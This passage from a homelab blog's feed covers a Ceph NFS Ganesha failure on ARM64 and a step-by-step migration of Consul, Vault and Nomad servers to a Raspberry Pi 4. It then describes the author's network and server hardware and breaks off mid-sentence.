<pre tabindex="0"><code>bash[61872]: debug 2022-12-21T11:57:05.302+0000 ffff84614280 -1 log_channel(cephadm) log [ERR] : Failed to apply nfs.my-nfs spec NFSServiceSpec.from_json(yaml.safe_load(&#39;&#39;&#39;service_type: nfs
bash[61872]: service_id: hn-nfs
bash[61872]: service_name: nfs.hn-nfs
bash[61872]: placement:
bash[61872]:   hosts:
bash[61872]:   - khonsu
bash[61872]: &#39;&#39;&#39;)): [Errno 2] No such file or directory: &#39;ganesha-rados-grace&#39;: &#39;ganesha-rados-grace&#39;
bash[61872]: Traceback (most recent call last):
bash[61872]:   File &#34;/usr/share/ceph/mgr/cephadm/serve.py&#34;, line 507, in _apply_all_services
bash[61872]:     if self._apply_service(spec):
bash[61872]:   File &#34;/usr/share/ceph/mgr/cephadm/serve.py&#34;, line 760, in _apply_service
bash[61872]:     daemon_spec = svc.prepare_create(daemon_spec)
bash[61872]:   File &#34;/usr/share/ceph/mgr/cephadm/services/nfs.py&#34;, line 66, in prepare_create
bash[61872]:     daemon_spec.final_config, daemon_spec.deps = self.generate_config(daemon_spec)
bash[61872]:   File &#34;/usr/share/ceph/mgr/cephadm/services/nfs.py&#34;, line 87, in generate_config
bash[61872]:     self.run_grace_tool(spec, &#39;add&#39;, nodeid)
bash[61872]:   File &#34;/usr/share/ceph/mgr/cephadm/services/nfs.py&#34;, line 225, in run_grace_tool
bash[61872]:     timeout=10)
bash[61872]:   File &#34;/lib64/python3.6/subprocess.py&#34;, line 423, in run
bash[61872]:     with Popen(*popenargs, **kwargs) as process:
bash[61872]:   File &#34;/lib64/python3.6/subprocess.py&#34;, line 729, in __init__
bash[61872]:     restore_signals, start_new_session)
bash[61872]:   File &#34;/lib64/python3.6/subprocess.py&#34;, line 1364, in _execute_child
bash[61872]:     raise child_exception_type(errno_num, err_msg, err_filename)
bash[61872]: FileNotFoundError: [Errno 2] No such file or directory: &#39;ganesha-rados-grace&#39;: &#39;ganesha-rados-grace&#39;
</code></pre><p>So it&rsquo;s missing the file <code>ganesha-rados-grace</code> in the Docker image Ceph uses.
A quick google of the error message leads to <a href="https://github.com/ceph/ceph-build/issues/1979">this bug</a>
in Ceph&rsquo;s GitHub repo. As indicated in the bug, the <a href="https://github.com/nfs-ganesha/nfs-ganesha">nfs-ganesha</a>
package is not available for ARM64. Ganesha is a user-space NFS server which can
export many different kinds of storage backends via NFS.</p>
<p>I&rsquo;m honestly not sure what the problem is here, but for me it just reads as if
Ganesha is not built for ARM64, so it doesn&rsquo;t become part of the ARM64 Ceph
container.</p>
<p>One of the reasons it took me so long to realize that this was the problem I
actually encountered: The new NFS daemon was supposed to run on the Hardkernel
H3 - and that&rsquo;s just an x86 machine. After some more tests, I finally realized
that the above error wasn&rsquo;t coming from the failed daemon start - it was coming
from my MGR instances on my Raspberry Pi!</p>
<p>And this makes sense: There are a couple of ganesha commands which need to be run
when a new daemon is initialized. And those commands run as part of the MGR NFS
module - and so are executed on the MGR host, not on the host which is going to
run the NFS daemon.</p>
<p>My only possible solution for now: Adding another MGR instance to the H3 (luckily
it has enough memory) and making that the active MGR instance whenever I need to
run NFS commands, which should not be too often.</p>
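<p>If I remember correctly, switching the active MGR is just a matter of failing
the current one so that a standby takes over, roughly like this (repeat until
the instance on the H3 is the active one):</p>
<pre tabindex="0"><code># fail the currently active MGR, a standby takes over
ceph mgr fail

# check which instance is active now
ceph mgr stat
</code></pre>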
<p>But as a consequence of this problem, I&rsquo;m now considering whether I should
just go ahead and order another two H3 to have all my Ceph nodes on x86. Decision
to be made later.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Cluster Controller Migration to a Raspberry Pi 4</title>
      <link>https://blog.mei-home.net/posts/cluster_controller_migration/</link>
      <pubDate>Sat, 10 Dec 2022 13:02:35 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/cluster_controller_migration/</guid>
      <description>Migrating my Vault/Nomad/Consul servers to a new host</description>
      <content:encoded><![CDATA[<p>I am currently working on distributing my Homelab a little bit more. My main
driver is high availability. Do I need high availability in a homelab setup?
No, not really. But I was getting annoyed by having to take down the entire
Homelab whenever I was doing an update on my single server.</p>
<p>The newest part of that project is my cluster controller. That is the machine
running the servers for my <a href="https://www.vaultproject.io/">Vault</a>,
<a href="https://www.consul.io/">Consul</a> and <a href="https://www.nomadproject.io/">Nomad</a>
cluster. Before the migration, this was yet another LXD VM on my homeserver. Now,
it&rsquo;s a Raspberry Pi 4 4GB.</p>
<p>This single Raspberry Pi will be joined by two more, so I will end up with three
instances of each of the servers. With that, I can finally reboot machines to
my heart&rsquo;s content without having to worry about currently running jobs. &#x1f389;
But this high availability nirvana is currently held up by Amazon/DHL being
unable to ship me my stuff. Seriously. For years, not a single problem with
delivery. But now all of a sudden, nothing arrives.</p>
<p>But enough venting. With time, it will all find its way to me. So for now,
enjoy this story of my migration. It will contain a lot of nerdery, large amounts
of exhilaration and, surprisingly, not a single &ldquo;Darn it. I will have to re-image
my entire homelab&rdquo; moment.</p>
<h2 id="preparations">Preparations</h2>
<p>This was actually a hefty part of the time I spent on this. Last weekend, I sat
down with all my Homelab repos and grep, because I had used both the single
cluster controller&rsquo;s IP and its hostname throughout my Ansible files, Terraform
files and just general scripting.
That was remedied by redirecting (almost, more later) everything to each
service&rsquo;s Consul supplied DNS entry, e.g. <code>nomad.service.consul</code> or
<code>vault.service.consul</code>.</p>
<p>With that taken care of, I read through all three tools&rsquo; HA/multi-server setup
documentation. The most straightforward (I thought&hellip;) was Vault, which doesn&rsquo;t
actually have a clustered mode, but only failover with some capability of
forwarding requests to the current leader from the standbys. Both Nomad and Consul
were a bit more complicated, in that they fully support multiple active servers.</p>
<p>Finally, I imaged the new Pi with Packer and Ansible to get it ready. To my
surprise, this time around the entire playbook ran through completely without
my intervention. No fixes necessary at all. &#x1f389;</p>
<p>I made one important change to the Ansible scripting: I disabled all automatic
enabling/starting of the three tools, because I wanted to migrate them one-by-one.
And sadly the OS I use, Ubuntu Server, just autostarts services right after
installation. And as far as I read, there is no reliable way to turn that off,
because it depends on each package&rsquo;s maintainer.
Just to make sure, I masked the systemd service files for the tools:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>systemctl mask nomad.service consul.service vault.service
</span></span></code></pre></div><p>This also works when the tools/service files aren&rsquo;t even installed yet.</p>
<p>One thing to look out for: What I&rsquo;m describing here was the full migration,
done mostly on two evenings. Running any of these tools with only two servers
is strongly advised against, as you will be running the risk of a &ldquo;split-brain&rdquo;
scenario. This is when there are only two instances of something, and they start
disagreeing on what reality looks like. I had Consul running for about a day
with two servers and did not see any problems, but HashiCorp strongly advises
against doing that for extended periods of time.</p>
<p>Finally, a side note: I decided to do the migration while the Homelab was still
up, but chickened out when it came to the Nomad server at the end.</p>
<h2 id="consul">Consul</h2>
<p>Consul was the first migration target because it was needed on the new host
to ensure that the two other servers were made visible via DNS.</p>
<p>The first step was changing two important configurations in the new server,
to make sure it can cleanly join the old server:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#75715e">#bootstrap_expect = 1
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>retry_join <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;oldserver.foo&#34;, &#34;newserver.foo&#34;</span>]
</span></span></code></pre></div><p>The important part is commenting out bootstrap_expect, so the new server doesn&rsquo;t
automatically elect itself as the cluster leader.</p>
<p>Then I just started the Consul server after unmasking it:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>systemctl unmask consul.service
</span></span><span style="display:flex;"><span>systemctl start consul.service
</span></span></code></pre></div><p>And I was actually off to the races? This just worked out of the box. The two
servers were immediately connected. They also seemed to (voluntarily) switch
the leadership role between themselves. All data was immediately shared between
them, and I was able to point my DNS server to the new server for <code>.consul</code>
queries immediately.</p>
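<p>In my case, &ldquo;pointing the DNS server&rdquo; means updating the forward zone in the
PowerDNS recursor so that <code>.consul</code> queries go to the new host&rsquo;s Consul DNS
interface. A sketch of the relevant recursor setting (the IP is an example,
8600 is Consul&rsquo;s default DNS port):</p>
<pre tabindex="0"><code>forward-zones-recurse=consul=10.86.5.10:8600
</code></pre>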
<p>I had to keep the old Consul server running for now, because it was also serving
as the Consul agent for registration purposes for the Vault and Nomad servers
on the old cluster controller.</p>
<p>Then, I restarted all the Consul agents on my clients, to update them
with a new <code>retry_join</code> value containing only the new Consul server. Also
worked without any problems.</p>
<p>One thing to look out for: Make sure to allow traffic to the new server from
all necessary network segments in your firewall.</p>
<p>I finally shut down the Consul server as the last service on the old cluster
controller via this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>consul leave
</span></span></code></pre></div><p>For this to work, you need to have a management token set in <code>CONSUL_HTTP_TOKEN</code>.
This makes the server gracefully leave the cluster, without creating any problems
due to a missing quorum with only one of two servers remaining.</p>
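<p>In other words, something along these lines (the token value is a placeholder):</p>
<pre tabindex="0"><code>export CONSUL_HTTP_TOKEN=&lt;management token&gt;
consul leave
</code></pre>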
<h2 id="vault">Vault</h2>
<p>This was the &ldquo;fun&rdquo; one. First of all, this data was really important to me. Then,
I had also completely misread the Vault HA documentation. <a href="https://developer.hashicorp.com/vault/docs/concepts/ha">In the docs</a>,
it is very clearly stated that HA mode needs a compatible backend. It also talks
a lot about the <a href="https://developer.hashicorp.com/vault/docs/configuration/storage/raft">Vault Integrated Storage</a>,
which uses HashiCorp&rsquo;s <code>raft</code> protocol for distributed storage of the secrets
store. And for some reason, I thought &ldquo;yeah, this is the recommended default,
I&rsquo;m pretty sure I did not stray from that when I set Vault up&rdquo;. But of course,
I had configured the simple <code>file</code> storage.</p>
<p>So now I had a problem: I did not have a HA compatible backend configured, and
I did not actually intend to start a HA setup right away - just migrate my
current single-server setup to a new host. What also frustrated me: I was not
able to figure out whether the Raft backend actually supports running in a single
server setup. I will have to dig a bit deeper on that.
Luckily, Vault already has support for migrating from one storage backend to
another, <code>vault operator migrate</code>, documented <a href="https://developer.hashicorp.com/vault/docs/commands/operator/migrate">here</a>.</p>
<p>So setting up two servers, automatically syncing them and then shutting
the old one down would not work. Instead, I just shut down the old one, copied
everything over to the new server, and started it up. This worked nicely, as far
as the data was concerned.</p>
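<p>The &ldquo;copy everything over&rdquo; step is nothing fancy, roughly this (paths and
hostnames are examples matching my file backend):</p>
<pre tabindex="0"><code># on the old server
systemctl stop vault.service
rsync -a /vault_storage/ newserver.foo:/vault_storage/

# on the new server
systemctl start vault.service
</code></pre>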
<p>But I had overlooked one important point. I do all my Homelab controlling via
a separate machine, with a lot of my services only allowing admin actions from
that machine, as a security measure. And as mentioned previously, I switched
the vault hostname to <code>vault.service.consul</code>. But: Consul only answers DNS
queries for healthy services. And Vault reports as unhealthy as long as it is
not unsealed with <code>vault operator unseal</code>. This command decrypts the secrets
on the disk. When I tried to unseal my new Vault instance, it failed because
it was not able to access <code>vault.service.consul</code>. So on my command and control
host, I now access Vault with the new host&rsquo;s hostname, instead of the <code>.consul</code>
address.</p>
<p>All in all, a bit more turbulent than the Consul migration, but still okay.
I did this migration live, and after a couple of minutes, some of my services
became unavailable, but came back immediately once the new Vault instance was
up and running.</p>
<h2 id="nomad">Nomad</h2>
<p>Finally, &ldquo;the big one&rdquo;. For Nomad, I chickened out and decided to take down
all jobs first, just in case it went badly wrong.</p>
<p>For Nomad, I luckily did not need to update all of the Nomad clients&rsquo; configs.
Nomad can use a local Consul agent to discover Nomad servers. This works for
both Nomad clients and Nomad servers.</p>
<p>The migration itself went well yet again. I only commented out <code>bootstrap_expect = 1</code>
again, to make sure the new server did not make itself the leader by default.
And yet again, the Raft state was transferred pretty quickly.</p>
<p>The problems started when I wanted to shut down the old server. This did not
work at all. When left to its own devices, the new server was just spewing failed
leader election errors:</p>
<pre tabindex="0"><code>&#34;2022-12-07T23:41:58.875+0100 [INFO]  nomad.raft: entering candidate state: node=\&#34;Node at 42.42.42:1234 [Candidate]\&#34; term=640&#34;
&#34;2022-12-07T23:41:58.879+0100 [ERROR] nomad.raft: failed to make requestVote RPC: target=\&#34;{Voter uuid-number-here 42.42.42.45:1234}\&#34; error=\&#34;dial tcp 42.42.42.45:1234: connect: connection refused\&#34;&#34;
&#34;2022-12-07T23:42:00.553+0100 [WARN]  nomad.raft: Election timeout reached, restarting election&#34;
</code></pre><p>First, I reached for <code>nomad server force-leave</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>nomad server forced-leave oldserver.global
</span></span></code></pre></div><p>This did not have any effect at all.</p>
<p>Then, I tried <code>nomad operator raft</code> to go down a layer:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>nomad operator raft remove-peer 42.42.42.45:4646
</span></span></code></pre></div><p>This also did not work, but I later realized that I might simply have used the
wrong port: <code>4646</code> is Nomad&rsquo;s HTTP port, while the raft peers use the RPC port <code>4647</code>.</p>
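<p>The raft peer set, including the addresses and ports the <code>remove-peer</code> command
expects, can be listed directly:</p>
<pre tabindex="0"><code>nomad operator raft list-peers
</code></pre>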
<p>What finally worked was using the <a href="https://developer.hashicorp.com/nomad/docs/configuration#leave_on_interrupt">leave_on_interrupt</a>
configuration option. The <code>leave_on_terminate</code> option also did not work.
So what I ended up doing was adding <code>leave_on_interrupt</code> to the old server&rsquo;s
config and starting it again.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>leave_on_interrupt <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>And then shutting it down again immediately:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>systemctl start nomad.service
</span></span><span style="display:flex;"><span>systemctl stop nomad.service
</span></span></code></pre></div><p>Now the old server was removed correctly, and the new server, being the only
one left, elected itself as leader as expected.</p>
<h2 id="final-thoughts">Final thoughts</h2>
<p>So that&rsquo;s it. The migration went far faster, and with far fewer problems than
I expected. The new cluster controller has been up for several days now, and I
do not observe any problems at all.</p>
<p>One tip: When you want to make sure that you don&rsquo;t accidentally start a service
on a machine, use <code>systemctl mask</code> on that service.</p>
<p>The Pi itself is making a good impression as a cluster controller as well, with
less than 5% CPU utilization on average and total memory consumption of about
500 MB for all three servers put together.</p>
<p>The next steps will consist of setting up the other two Pis and configuring all
three servers for HA. In addition, the three Pis will also serve as MON and MGR
daemons for my Ceph cluster.
Due to the Amazon/DHL delivery SNAFU, I will probably not be able to set up the full
HA implementation with three hosts this weekend. &#x1f622;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Current Homelab - Hardware</title>
      <link>https://blog.mei-home.net/posts/homelab-2022/hardware/</link>
      <pubDate>Thu, 27 Oct 2022 15:57:30 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/homelab-2022/hardware/</guid>
      <description>An overview over my current Homelab&amp;#39;s hardware in 2022</description>
      <content:encoded><![CDATA[<p>After finally finishing my series on netbooting Raspberry Pis, the initial
trigger for creating this blog, I want to give an overview of what my current
Homelab is looking like.</p>
<p>In this article, I will provide an overview of the hardware and hosts that I
currently have. The next one will be about the stack I&rsquo;m using, with a bit more
detail on my storage solution, Ceph, and my cluster running Nomad, Consul and
Vault.
The final article will then be an overview of the services I&rsquo;m running on the
cluster.</p>
<p>I&rsquo;m also planning a nice trip down memory lane, looking back at the past
12 years of homelabbing and describing all of the changes my setup saw, with
my reasons for the changes I made (where I can actually remember them &#x1f609;).</p>
<p>I have been running local services of some kind since about 2012. But my
renewed interest in self-hosting and my Homelab came in the autumn of 2020. I
had just switched my Internet connection from 50 MBit/s to 250 MBit/s. This also
meant a change of connection type, from ADSL to VDSL2. What I did not know at
the time: My Fritz!Box, a consumer grade DSL modem/switch/WiFi AP/DECT base station
combo unit did not actually speak VDSL2. Luckily for me, the connection still
worked, but only with 100 MBit/s peak data rate.</p>
<p>So I needed a new DSL modem. But that was the only thing I really needed. The
router, switch, WiFi AP, DECT base station were all fine and the Fritz!Box
firmware was also okay and provided a nice set of options. But I would still need
to replace the entire unit, just because the modem did not speak the new DSL
wire protocol.</p>
<p>That&rsquo;s another 200 bucks for a new Fritz!Box supporting VDSL2. Don&rsquo;t get me
wrong, I ended up investing way more into what I have now than that. It was more
the principle of &ldquo;Your DSL modem is out of date, you also have to replace your
perfectly fine WiFi AP etc&rdquo;. That annoyed me. Because that doesn&rsquo;t just mean
a new device, but also a fresh setup of said new device. It just seemed unnecessary
to me, and so I embarked on the task of getting separate physical machines for
each of these tasks. And because I wanted to monitor all of them, I introduced
a Prometheus/Grafana stack. And the rest, as they say, is history. &#x1f609;</p>
<h1 id="networking-and-infrastructure">Networking and infrastructure</h1>
<p>Let&rsquo;s start with the networking infrastructure. In short: It&rsquo;s a mess. &#x1f605;
When imagining my Homelab, do not imagine any sort of cable routing, let alone
proper cable management. I believe the only &ldquo;cable management&rdquo; I ever did was to
start buying very short network cables, for those times where a host is right
next to the switch.</p>
<p>There&rsquo;s also no rack to be found anywhere. While I&rsquo;ve got some 64 square meters
in my place, most of it is either my living room or my bedroom. And in neither
would I want to place a rack. It is far more convenient to place some small hosts
in a corner somewhere.</p>
<p><img alt="The homelab cupboard in my living room" loading="lazy" src="../homelab-cupboard.jpg"></p>
<p>This is about half of my Homelab. It&rsquo;s a couple of Raspberry Pis and an Udoo
connected to a <a href="https://www.netgear.com/de/business/wired/switches/plus/gs108e/">Netgear GS108E</a>,
1G switch. I will discuss the hosts in the next section, for now let&rsquo;s continue
with the main networking appliances:</p>
<p><img alt="My networking gear" loading="lazy" src="../networking_gear.jpg"></p>
<p>Here is the main networking part of my Homelab. It contains multiple parts
separating the firewall, VDSL modem, WiFi AP and DECT base station.</p>
<p>The center piece here is another switch, the <a href="https://www.netgear.com/de/business/wired/switches/plus/gs116ev2/">GS116E</a> with 16 1G ports.
It connects the main networking hosts as well as my main desktop machine and has
a connection to the previously mentioned 8 port switch in my Homelab cupboard.</p>
<p>Next comes the firewall machine. It is a passively cooled <a href="https://www.ipu-system.de/produkte/ipu672.html">NRG Systems IPU672</a>.
It is built around an Intel i5-7200U laptop part, which has more than enough
power to run my firewall. It has 6 networking ports and a serial console
connection.
Initially, I wanted to run my firewall on a <a href="https://www.pcengines.ch/apu2e4.htm">PC Engines APU2E4</a>,
which comes highly praised by the router community. But I figured pretty quickly
that, while the machine was plenty quick, it was not actually quick enough.
At the time, I had just switched to a 250 MBit/s connection, and the APU2 was
not able to do full speed with traffic shaping enabled.
As far as I know, that was because the FreeBSD based <a href="https://opnsense.org/">OPNsense</a>
system has bad networking drivers that need high single core performance because
any packet stream can only ever be handled by a single core, never split over
multiple cores.
But with the new IPU672, I&rsquo;m now pretty confident that I will not have any
problems even when 1GBit fiber finally arrives in my borough.</p>
<p>As already said, the machine uses the <a href="https://opnsense.org/">OPNsense</a> firewall
distribution. The fact that it was based on FreeBSD and not Linux was pretty
interesting to me, as I did not have any previous experience with BSD. Besides
serving as my Firewall, it is also my router to the rest of the Internet. It
also hosts an <a href="https://www.nlnetlabs.nl/projects/unbound/about/">Unbound</a> DNS
server instance. This instance is fed every new DHCP lease handed out and it
forwards to a <a href="https://github.com/PowerDNS/pdns">PowerDNS</a> DNS server which
is authoritative for all domains which are not direct host names in
my Homelab. Furthermore, the firewall runs a DynDNS client to update my domain
when my ISP provided public IP changes.
It also hosts a WireGuard server for external connections into my Homelab.
My internal domain for hosts is <code>.home</code>, as mentioned partially in <a href="https://www.rfc-editor.org/rfc/rfc8375#ref-SUDN">RFC8375</a>.
This is also the search domain configured via DHCP for all local hosts.
The firewall also serves to create my
external connection to the rest of the world, by managing the PPPoE connection
to my provider.</p>
<p>This connection is directly tied to the next machine, a <a href="https://www.draytek.com/products/vigor165/">DrayTek Vigor 165</a>.
This is a VDSL modem/router combination machine. I&rsquo;ve currently got a 250 MBit/s
line from Deutsche Telekom, paying about 50 bucks for it. In reality, most of the
time, I&rsquo;m getting 300 MBit/s, which is pretty nice. Save for a short stretch
in February 2020, the connection has been very stable for me.
The modem is running in bridge mode. This means that it only makes the Layer 1
connection to the line card in the DSLAM, but it does not actually connect
me to DT&rsquo;s infrastructure or get me an external IP. That PPPoE connection is
handled by my firewall host.</p>
<p>The next piece of networking hardware is a <a href="https://www.tp-link.com/en/home-networking/wifi-router/archer-c7/">TP Link Archer C7</a>
serving as my WiFi access point. Instead of the stock firmware, I&rsquo;m using
<a href="https://openwrt.org/">OpenWRT</a>. That was pretty much the main reason for choosing
the TP Link Archer: It was fully supported by OpenWRT and wasn&rsquo;t too expensive.</p>
<p>And the final network device: A <a href="https://www.gigaset.com/de_de/gigaset-go-box-100/">Gigaset Go-Box 100</a> (Sorry, in German only).
This little box is a DECT base station for connecting cordless phones (not smartphones &#x1f609;). Landline phones
are still sometimes used in Germany, and I use it from time to time to call my
family. Plus, mobile reception isn&rsquo;t too good in my flat. This was actually
the most complicated part to figure out when I revamped my networking setup. There
are a lot of possibilities if you would like to have some combined device for
DECT telephony, with a switch and DSL router. But this one was the only thing I
was able to find which allows VoIP via ethernet cable and only does DECT, nothing
else.</p>
<h1 id="power-delivery">Power delivery</h1>
<p>Short aside on power delivery: I&rsquo;ve got a grand total of three wall sockets
available under/near my desk. And I must admit that I don&rsquo;t like that fact, as
I&rsquo;m reasonably sure that they&rsquo;re all connected to a single circuit and breaker.
I&rsquo;ve never had any problems at all with power overload, and I&rsquo;m currently in the
process of moving to lower power draw machines - but still.</p>
<p>Quite beside the &ldquo;Does the circuit actually support this?&rdquo; question, there is
also the problem of power strips. Currently, there are three power strips, one
in each of the wall sockets. But I&rsquo;ve got a lot of machines which have
their power supply as part of the plug, and not internal to the device. This
means that I&rsquo;m not able to use all available sockets on my power strips. So what
did I have to do? I chained power strips, of course. Again, due to the mostly
low power nature of my hosts, that isn&rsquo;t a problem - but it also isn&rsquo;t exactly best
practice. And with newer gaming PCs going up to &gt;1000 W in consumption, having
multiple things plugged into a 2000 W power strip might soon no longer be
possible.</p>
<p>I was hoping to solve the space problem at least by buying a socket tower instead
of a strip, in the hopes that large power plugs only block a single other socket,
instead of two. That also did not really work out, but at least I&rsquo;m now having
enough sockets for all currently planned expansions.</p>
<h1 id="hosts">Hosts</h1>
<p>So besides the networking equipment, what else is there?</p>
<p>Let&rsquo;s start with the one machine which doesn&rsquo;t have anything to do with the
Homelab: My daily driver desktop. This is an AMD 3900X 12c/24t part. It&rsquo;s sitting
alongside an AMD Radeon RX580. Luckily for me, my &ldquo;Steam list of shame&rdquo; is so
long that it&rsquo;s still going to be a while until that RX580 can&rsquo;t handle the games
I want to play. &#x1f609;
The machine is running <a href="https://www.gentoo.org/">Gentoo Linux</a>. Why? Because
that was my first Linux distro back in 2007, mostly. It has never once disappointed
me in over 15 years as my main driver. Also, it is a very nice justification
for always buying the newest CPUs with the most cores. &#x1f605;</p>
<p>And here is the current centerpiece of my Homelab:</p>
<p><img alt="My main server" loading="lazy" src="../main_server.jpg"></p>
<p>This is my main server, an Intel Core i7 10700 @2.90 GHz with 8c/16t. It has
94 GB of RAM and a lot of storage:</p>
<ul>
<li>2x WD Red 4 TB, general Homelab storage in Ceph</li>
<li>2x Samsung SSD 860 Pro for the host&rsquo;s root disk</li>
<li>2x Samsung SSD 860 EVO 1TB in Ceph cluster mostly used for VM&rsquo;s/netbooted host&rsquo;s
root disks</li>
</ul>
<p>It currently runs Arch Linux. That&rsquo;s also mostly because Arch Linux has been
my server distro for years now. But it is bad at it. A server OS needs stability,
and Arch has not been able to deliver that for ages. Each update breaks either Ceph,
LXD or Qemu. Considering that those are the only three things running on it, that&rsquo;s
an extremely poor showing. The only reason it&rsquo;s still there is that I&rsquo;m going
to switch to a cluster of Pis soonish and don&rsquo;t want to redo everything.</p>
<p>So from my PoV: Avoid Arch Linux like the plague. The only good thing about it
is its wiki.</p>
<p>As said above, the server does not run very much anymore, only LXD for virtual
machines. There are two types of VMs running on the host: One, a couple
of <a href="https://ceph.io/">Ceph</a> VMs using the two WD Red and the Samsung EVO
SSDs for a storage cluster. This is one more problem with my current setup:
Yes, I have different VMs for the different Ceph hosts - but they&rsquo;re still in
the same physical host. So when I have to reboot the machine (all the time with Arch),
I have to shut down everything. More on that later.
These Ceph VMs cannot, of course, use Ceph RBDs for their root disks, as their
task is in providing Ceph RBDs to other machines. Their root disks are in a
local LXD storage pool.
The second class of VMs are service VMs, which are running parts of my
<a href="https://www.nomadproject.io/">Nomad</a> cluster. All of these machines are getting
their root disk storage from the Ceph cluster as Ceph RBDs.</p>
<p>That&rsquo;s the problem with my setup: When this one physical host shuts down, my
storage cluster, and with it most of my hosts, VM as well as physical, are gone.
This also means that during upgrades (regular occurrence with Arch), I have to
shut down everything else. First, the physical hosts netbooting with Ceph RBD
volumes. Then the VMs booting from Ceph RBD volumes. And only then can I update
the main machine. This is why that large physical host is soon going to be
replaced by a whole cluster of Raspberry Pis, both for the Ceph cluster as well
as the Nomad cluster.</p>
<p>And this is a perfect transition to the next machine, the experimental Ceph Pi
setup.</p>
<p><img alt="My &ldquo;Can it run Ceph&rdquo; CM4" loading="lazy" src="../ceph_pi.jpg"></p>
<p>This Pi CM4 is living on a <a href="https://www.raspberrypi.com/products/compute-module-4-io-board/">CM4 IO board</a>.
In a standard ATX enclosure. With an ATX power supply and a Seagate IronWolf
4 TB HDD. In the PCIe slot of the IO board is a PCIe to SATA card. The idea
here is that, as mentioned above, I would like to switch to Pis as my Ceph cluster
hosts, but I was dubious about whether it will actually work. Thus I set up this
Frankenstein setup with a manual power switch bridging the right pins in the
ATX 24 PIN power connector, because I don&rsquo;t have a mainboard in the machine, but
I needed a power supply to connect the disks to. The CM4 8GB is running Ubuntu
server, with Ceph running baremetal. (Well, in Docker containers. More details
in the next post on software)
The verification has been pretty successful. I have not had any stability problems
whatsoever, and speed also seems to be okayish. The one downside: The PCIe bus
the CM4 makes available is only a single PCIe2 x1 lane. That means a maximum
of 500 MByte per second in throughput, which means even a single good SSD could
saturate the interface.</p>
<p>Next up: Command and Control.</p>
<p><img alt="My Command and Control server" loading="lazy" src="../candc.jpg"></p>
<p>As mentioned in the networking section, I
initially wanted to use an APU2E4 for my firewall/router, but it was too slow
with all the features I wanted. But the machine itself was still fine. It is
passively cooled, has an internal 16GB SSD and a four core processor. A slow
4 core processor, but that&rsquo;s fine. It now serves as my Command and Control server.
When doing any work on the cluster, be it on Ceph or the Nomad cluster or Consul
or Vault, I do it from this machine. The access keys for most things are stored
here, many parts of my Homelab only accept control commands from this one machine
in my network. The main reason I did it like this was to have a machine separate
from my daily driver and my travel laptop, so that I would only have to store
access keys and install all necessary tools on a single host.
One thought on future work for this machine is that it has three NICs. So if I
ever get around to introducing a segmented network with a management subnet, I
can do so.</p>
<p><img alt="My cluster master Pi" loading="lazy" src="../cluster_master.jpg"></p>
<p>This particular machine does not have anything interesting, HW wise. It&rsquo;s a
Raspberry Pi 4 4GB. It is attached to <a href="https://shop.inux3d.com/en/home/53-99-the-terrapi-q-a-quiet-terrapi.html#/10-color-red/26-ssd-single">this case from TerraPi</a>.
There&rsquo;s also a Kingston 120 GB SSD connected with a USB to SATA adapter.
The reason this machine is not netbooted is that it is supposed to be the
second &ldquo;foundational&rdquo; machine, besides my firewall host. Hence, it cannot use
any services from any other machine. It runs Ubuntu, like all other Pis, and
also provides an NFS share mounted on all hosts, for easy and quick data
sharing.
Its current main function is as an internal DNS server and a netboot server
with DNSmasq.</p>
<p><img alt="My Udoo X86 host" loading="lazy" src="../udoo.jpg"></p>
<p>This is my token X86 host. It is an <a href="https://shop.udoo.org/en/udoo-x86-ii-ultra.html">Udoo X86 II</a>
with an Intel Pentium N3710 with 2.56 GHz.
It does not have any internal storage (it has eMMC, but I&rsquo;m not using it), and
is instead using netbooting. It was interesting to set up, as in contrast to
the Raspberry Pi&rsquo;s, it does netbooting a different, more common way with
Syslinux. It is there to provide an X86 node when my cluster is entirely
migrated to ARM based Pis. Just for those few remaining cases where apps I
would like to run do not have an ARM version available.</p>
<p><img alt="My test Pi 4 node" loading="lazy" src="../pi_node.jpg"></p>
<p>This is a Raspberry Pi 4 8GB. It is configured as a cluster node in my Nomad
cluster. It doesn&rsquo;t have any local storage but is netbooted. It is there to
test whether everything works with a Raspberry Pi as a cluster node. And I&rsquo;m
pretty happy to report: Yes it does! It runs Consul and Nomad and Docker
perfectly fine. The performance is also pretty fine. For some reason, Nomad
has taken to putting my PostgreSQL job on the Pi most of the time. But I was
not seeing any problems whatsoever.
Granted, it&rsquo;s not all honey and sunshine. The Pi&rsquo;s CPU is still a relatively
low powered ARM one. So for a couple of services, I can actually tell when they
got scheduled on the Pi instead of my main server. But that&rsquo;s also fine for me.</p>
<h1 id="the-future">The Future</h1>
<p>In the future, I&rsquo;m planning to migrate away from the single large x86 server
